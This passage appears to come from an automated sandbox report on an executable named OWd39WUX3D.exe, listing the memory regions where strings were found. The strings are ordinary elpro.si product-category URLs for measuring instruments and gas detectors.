              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-tlaka/rotronic-merilniki-diferencialnega-tlaka/
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-tlaka/sistemi-tlacnih-vmesnikov/
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-tlaka/tlacna-stikala/
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-tlaka/tlacni-vmesniki/
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-tlaka/ventili-in-zascitne-naprave-za-merilnike-tla
              Source: OWd39WUX3D.exe, 00000000.00000003.383105227.00000000034A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-vlage/
              Source: OWd39WUX3D.exe, 00000000.00000003.383105227.00000000034A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-vlage/comet-vlaga-dew-point-monitoring-kalibracija
              Source: OWd39WUX3D.exe, 00000000.00000003.383105227.00000000034A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-vlage/michell-instruments-dew-point-merilniki-tock
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-vlage/prenosni-merilniki-vlage-temperature-in-atmo
              Source: OWd39WUX3D.exe, 00000000.00000003.383105227.00000000034A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-vlage/rotronic-vlaga-aktivnost-vode-dew-point-moni
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/obnove-in-posodobitve-strojev-in-naprav/
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/precizna-temperaturna-tipala/
              Source: OWd39WUX3D.exe, 00000000.00000003.383105227.00000000034A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/prenosni-osebni-detektorji-wireless/
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/prenosni-osebni-detektorji-wireless/vecih-plinov-prenosni-os
              Source: OWd39WUX3D.exe, 00000000.00000003.383105227.00000000034A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/prenosni-osebni-detektorji/
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/prenosni-osebni-detektorji/vecih-plinov/
              Source: OWd39WUX3D.exe, 00000000.00000003.383105227.00000000034A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/razdelitev-po-standardih-direktivah/
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.498907657.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.488845793.0000000003D10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/razdelitev-po-standardih-direktivah/2014-30-eu/
              Source: OWd39WUX3D.exe, 00000000.00000003.493545955.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.495708702.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.613983406.00000000042B0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.492582677.0000000006E30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605622373.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606432252.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600057998.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489317342.0000000003430000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.606278367.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.489091593.0000000003690000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.605268659.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.601555635.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.600719355.0000000004070000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 